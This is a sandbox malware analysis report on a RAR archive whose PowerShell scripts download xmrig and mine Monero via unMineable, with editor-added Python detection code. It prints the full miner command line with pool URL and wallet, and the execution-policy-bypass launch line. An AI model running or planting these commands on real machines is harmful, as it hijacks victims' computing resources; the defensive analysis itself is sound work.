Malware Analysis Report

2025-04-19 18:43

Sample ID 240527-arwvlsae57
Target main2.rar
SHA256 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Tags
xmrig execution miner
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1 (Detonation Overview, Signatures)
Behavioral analyses, each with Detonation Overview, Command Line, Signatures, Processes, Network and Files: behavioral19, behavioral29, behavioral10, behavioral12, behavioral22, behavioral32, behavioral27, behavioral7, behavioral9, behavioral18, behavioral20, behavioral28, behavioral31, behavioral3, behavioral6, behavioral21, behavioral23, behavioral26, behavioral4, behavioral11, behavioral15, behavioral25, behavioral30, behavioral1, behavioral5, behavioral8, behavioral14, behavioral17, behavioral24, behavioral2, behavioral16, behavioral13

Of these, only static1, behavioral19, behavioral29, behavioral10 and behavioral12 are reproduced below; the page ends partway through the behavioral12 file list.

Analysis Overview

score
10/10

SHA256

08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b

Threat Level: Known bad

The file main2.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

XMRig Miner payload

xmrig

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious behavior: LoadsDriver

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 00:27

Signatures

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:00

Platform

win10v2004-20240508-en

Max time kernel

1795s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
64 signature hits; the sandbox recorded no description, indicator, process or target for any of them.

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

xmrig enables SeLockMemoryPrivilege so it can back its RandomX dataset (the -a rx algorithm on the command line) with large pages. Ordinary user-mode software almost never requests this privilege, so a process enabling it is a useful miner indicator on its own, independent of the image name.

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1036,i,6576818814118437872,11004518367271063231,262144 --variations-seed-version --mojo-platform-channel-handle=3948 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3956,i,6576818814118437872,11004518367271063231,262144 --variations-seed-version --mojo-platform-channel-handle=1644 /prefetch:8

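The two command lines above carry everything needed for a process-creation detection: powershell.exe launched with -ExecutionPolicy bypass on a script under %TEMP%, then a dropped binary pointed at a stratum pool with -o, the RandomX algorithm with -a rx, and a coin:wallet.worker user string with -u. The pool is reached over TLS on port 443, so port alone will not separate it from ordinary HTTPS; the flags and the URL scheme will. The Python below is an added example by the editor, not sandbox output and not a vendor tool. The three sample command lines are copied from this Processes section (the Edge utility process is included as a benign control, shortened to its image path and three switches); the rule names, regexes and the %TEMP% check are the editor's own assumptions.

```python
"""Command-line triage for the process tree in this report.

Added example by the editor, not output of the sandbox and not a vendor tool.
SAMPLE_CMDLINES is constructed from the Processes section above (the Edge line
is a shortened benign control); rule names and regexes are the editor's own.
"""
import re
from dataclasses import dataclass, field

# stratum[+ssl|+tls|+tcp]://host:port, the pool URL form xmrig accepts with -o/--url
STRATUM_RE = re.compile(
    r"^stratum(?:\+(?:ssl|tls|tcp))?://(?P<host>[^:/\s]+):(?P<port>\d{1,5})$", re.I)
# -u/--user as used with unMineable: <COIN>:<wallet>.<worker>; coin and worker are optional
USER_RE = re.compile(
    r"^(?:(?P<coin>[A-Z0-9]{2,10}):)?(?P<wallet>[A-Za-z0-9]{20,})(?:\.(?P<worker>[\w-]+))?$")

POOL_FLAGS = {"-o", "--url"}
USER_FLAGS = {"-u", "--user"}
ALGO_FLAGS = {"-a", "--algo"}

SAMPLE_CMDLINES = [  # constructed from the report's Processes section
    r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"',
    r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 '
    r'-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x',
    r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --lang=en-US /prefetch:8',
]


@dataclass
class Finding:
    rule: str
    image: str
    details: dict = field(default_factory=dict)


def split_windows_cmdline(cmdline: str) -> list[str]:
    """Split on whitespace but keep double-quoted arguments together, quotes stripped."""
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', cmdline)]


def value_after(argv: list[str], flags: set[str]):
    """Return the argument following the first flag in `flags` (case-insensitive), or None."""
    for i, tok in enumerate(argv[:-1]):
        if tok.lower() in flags:
            return argv[i + 1]
    return None


def triage_miner(cmdline: str):
    """Flag any process whose -o/--url argument is a stratum pool URL, whatever the image name."""
    argv = split_windows_cmdline(cmdline)
    pool = value_after(argv, POOL_FLAGS) if argv else None
    match = STRATUM_RE.match(pool) if pool else None
    if not match:
        return None
    details = {"pool_host": match["host"].lower(), "pool_port": int(match["port"]),
               "tls": pool.lower().startswith(("stratum+ssl", "stratum+tls")),
               "algo": value_after(argv, ALGO_FLAGS)}
    user = value_after(argv, USER_FLAGS)
    um = USER_RE.match(user) if user else None
    if um:
        details.update(coin=um["coin"], wallet=um["wallet"], worker=um["worker"])
    return Finding("stratum_miner_cmdline", argv[0], details)


def triage_powershell(cmdline: str):
    """Flag powershell.exe launched with ExecutionPolicy Bypass and/or a script under %TEMP%."""
    argv = split_windows_cmdline(cmdline)
    if not argv or not argv[0].lower().endswith("powershell.exe"):
        return None
    low = [a.lower() for a in argv]
    details = {}
    for i, tok in enumerate(low[:-1]):
        # powershell.exe accepts unambiguous prefixes of its switches: -ep, -ex, -exec, -executionpolicy
        if (tok == "-ep" or (len(tok) >= 3 and "-executionpolicy".startswith(tok))) and low[i + 1] == "bypass":
            details["execution_policy"] = "bypass"
        if tok in ("-f", "-file"):
            details["script"] = argv[i + 1]
            details["script_in_temp"] = "\\appdata\\local\\temp\\" in low[i + 1]
    if not details:
        return None
    return Finding("powershell_bypass_script", argv[0], details)


def triage(cmdlines) -> list[Finding]:
    """Run both rules over a list of command lines and return every finding in input order."""
    findings = []
    for line in cmdlines:
        for rule in (triage_miner, triage_powershell):
            found = rule(line)
            if found:
                findings.append(found)
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_CMDLINES):
        print(finding.rule, finding.image, finding.details)
```

The miner rule keys on the -o argument rather than the file name, which is what survives a rename of xmrig.exe; the extracted wallet and worker strings are the values worth pivoting on across other samples.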
Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 41.173.79.40.in-addr.arpa udp
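Read in order, the table above is the miner's whole life cycle: forward lookups and TLS connections to github.com and objects.githubusercontent.com (the xmrig release download), then rx.unmineable.com on 443 (pool contact), with fifteen .in-addr.arpa PTR queries and one www.bing.com connection from Edge as sandbox noise around them. The Python below is an added example by the editor, not sandbox output and not a vendor tool. It parses the flattened rows, separates the noise from the download and pool stages, and checks that the download precedes the pool contact; the rows are copied from this table, and the three domain lists are assumptions drawn from this report rather than a threat feed.

```python
"""Network-table triage for this report.

Added example by the editor, not sandbox output and not a vendor tool.
NETWORK_ROWS is copied from the behavioral19 Network section; the domain
lists are the editor's assumptions drawn from this report, not a feed.
"""

NETWORK_ROWS = """\
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 41.173.79.40.in-addr.arpa udp
"""

# Assumed classification lists, derived from this report rather than a threat feed.
POOL_DOMAINS = {"unmineable.com"}                                # host seen in the xmrig -o flag
PAYLOAD_HOSTS = {"github.com", "objects.githubusercontent.com"}  # where the xmrig release was fetched
SANDBOX_NOISE = {"www.bing.com"}                                 # Edge background traffic in the VM


def parse_rows(text: str) -> list[dict]:
    """Turn the flattened 'Country Destination Domain Proto' rows into dicts."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        country, dest, domain, proto = parts
        ip, _, port = dest.rpartition(":")
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain.lower(), "proto": proto.lower()})
    return rows


def in_domains(domain: str, suffixes: set[str]) -> bool:
    return any(domain == s or domain.endswith("." + s) for s in suffixes)


def classify(row: dict) -> str:
    """Label one row; a DNS query is labelled by the name it resolves."""
    d = row["domain"]
    if d.endswith(".in-addr.arpa"):
        return "reverse_lookup"   # PTR queries the VM makes for peers it talked to: noise
    if in_domains(d, POOL_DOMAINS):
        return "pool"
    if in_domains(d, PAYLOAD_HOSTS):
        return "payload_fetch"
    if in_domains(d, SANDBOX_NOISE):
        return "sandbox_noise"
    return "unclassified"


def triage_network(rows: list[dict]) -> dict:
    """Collect tcp connections per class and the order in which the two attack stages first appear."""
    summary = {"reverse_lookups": 0, "pool_contacts": [], "payload_fetch": [],
               "sandbox_noise": [], "unclassified": [], "stage_order": []}
    buckets = {"pool": "pool_contacts", "payload_fetch": "payload_fetch", "sandbox_noise": "sandbox_noise"}
    for row in rows:
        label = classify(row)
        if label == "reverse_lookup":
            summary["reverse_lookups"] += 1
            continue
        if label in ("pool", "payload_fetch") and label not in summary["stage_order"]:
            summary["stage_order"].append(label)   # first sighting, DNS query or connection
        if row["proto"] != "tcp":
            continue                               # forward DNS queries are not connections
        summary[buckets.get(label, "unclassified")].append((row["domain"], row["ip"], row["port"]))
    return summary


def verdict(summary: dict) -> str:
    """A miner verdict wants both the pool connection and the download that preceded it."""
    if summary["pool_contacts"] and summary["stage_order"] == ["payload_fetch", "pool"]:
        return "miner: payload fetched, then pool contacted"
    if summary["pool_contacts"]:
        return "miner: pool contacted"
    return "no pool contact"


if __name__ == "__main__":
    result = triage_network(parse_rows(NETWORK_ROWS))
    print(verdict(result), result)
```

Everything here goes to port 443, so the only usable network signals are the destination names and the ordering; in production the three lists would come from a pool/CDN feed, and the PTR noise would be dropped before the rows reach the rule.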

Files

memory/3760-0-0x00007FFE9C4D3000-0x00007FFE9C4D5000-memory.dmp

memory/3760-1-0x000001A883A60000-0x000001A883A82000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qszyeyfu.tbd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

__PSScriptPolicyTest_<random>.ps1 is a scratch file PowerShell itself writes to %TEMP% to test whether AppLocker or WDAC script enforcement applies to it. It is a host artifact of running powershell.exe, not a payload dropped by the script, and its hashes should not be used as indicators.

memory/3760-11-0x00007FFE9C4D0000-0x00007FFE9CF91000-memory.dmp

memory/3760-12-0x00007FFE9C4D0000-0x00007FFE9CF91000-memory.dmp

memory/3760-14-0x00007FFE9C4D0000-0x00007FFE9CF91000-memory.dmp

memory/3760-15-0x000001A89E290000-0x000001A89E2A2000-memory.dmp

memory/3760-16-0x000001A89E270000-0x000001A89E27A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2028-47-0x0000029442720000-0x0000029442740000-memory.dmp

memory/2028-48-0x0000029443F20000-0x0000029443F40000-memory.dmp

memory/2028-49-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/3760-50-0x00007FFE9C4D3000-0x00007FFE9C4D5000-memory.dmp

memory/3760-51-0x00007FFE9C4D0000-0x00007FFE9CF91000-memory.dmp

memory/2028-52-0x0000029443F40000-0x0000029443F60000-memory.dmp

memory/2028-53-0x0000029443F60000-0x0000029443F80000-memory.dmp

memory/2028-54-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/3760-55-0x00007FFE9C4D0000-0x00007FFE9CF91000-memory.dmp

memory/2028-56-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-57-0x00007FF625980000-0x00007FF6265B3000-memory.dmp

memory/2028-59-0x0000029443F60000-0x0000029443F80000-memory.dmp

memory/2028-58-0x0000029443F40000-0x0000029443F60000-memory.dmp

memory/2028-60 through memory/2028-118 (59 dumps): 0x00007FF625980000-0x00007FF6265B3000-memory.dmp, the same region each time

Analysis: behavioral29

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:11

Platform

win7-20231129-en

Max time kernel

1558s

Max time network

1559s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Network

N/A

Files

memory/1044-4-0x000007FEF5E5E000-0x000007FEF5E5F000-memory.dmp

memory/1044-5-0x000000001B640000-0x000000001B922000-memory.dmp

memory/1044-6-0x0000000001F50000-0x0000000001F58000-memory.dmp

memory/1044-7-0x000007FEF5BA0000-0x000007FEF653D000-memory.dmp

memory/1044-8-0x000007FEF5BA0000-0x000007FEF653D000-memory.dmp

memory/1044-9-0x000007FEF5BA0000-0x000007FEF653D000-memory.dmp

memory/1044-10-0x000007FEF5BA0000-0x000007FEF653D000-memory.dmp

memory/1044-11-0x000007FEF5BA0000-0x000007FEF653D000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:41

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1752s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
64 signature hits; the sandbox recorded no description, indicator, process or target for any of them.

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.173.189.20.in-addr.arpa udp

Files

memory/1468-2-0x00007FFA60383000-0x00007FFA60384000-memory.dmp

memory/1468-5-0x000001CB3B810000-0x000001CB3B832000-memory.dmp

memory/1468-8-0x000001CB53EA0000-0x000001CB53F16000-memory.dmp

memory/1468-10-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4tbtdi1b.sqe.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1468-9-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/1468-25-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/1468-48-0x000001CB54350000-0x000001CB54362000-memory.dmp

memory/1468-61-0x000001CB53E60000-0x000001CB53E6A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4016-90-0x000002A397B40000-0x000002A397B60000-memory.dmp

memory/4016-91-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/1468-92-0x00007FFA60383000-0x00007FFA60384000-memory.dmp

memory/4016-93-0x00007FF789940000-0x00007FF78A573000-memory.dmp

memory/1468-94-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/1468-95-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/4016-96 through memory/4016-156 (61 dumps): 0x00007FF789940000-0x00007FF78A573000-memory.dmp, the same region each time

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:54

Platform

win11-20240426-en

Max time kernel

1799s

Max time network

1756s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
64 signature hits; the sandbox recorded no description, indicator, process or target for any of them.

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/1380-0-0x00007FFD77043000-0x00007FFD77045000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vx3c345f.21k.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1380-9-0x000001AE38DF0000-0x000001AE38E12000-memory.dmp

memory/1380-10-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp

memory/1380-11-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp

memory/1380-12-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp

memory/1380-14-0x000001AE38DC0000-0x000001AE38DD2000-memory.dmp

memory/1380-15-0x000001AE20A60000-0x000001AE20A6A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3808-46-0x0000021212140000-0x0000021212160000-memory.dmp

memory/3808-47-0x0000021212190000-0x00000212121B0000-memory.dmp

memory/3808-48-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-49-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/1380-50-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp

memory/1380-51-0x00007FFD77043000-0x00007FFD77045000-memory.dmp

memory/3808-52-0x00000212121B0000-0x00000212121D0000-memory.dmp

memory/3808-53-0x00000212121D0000-0x00000212121F0000-memory.dmp

memory/3808-54-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-55-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-56-0x00000212121B0000-0x00000212121D0000-memory.dmp

memory/3808-57-0x00000212121D0000-0x00000212121F0000-memory.dmp

memory/3808-58 through memory/3808-105 (48 dumps): 0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp, the same region each time

memory/3808-106-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-107-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-108-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-109-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-110-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-111-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-112-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

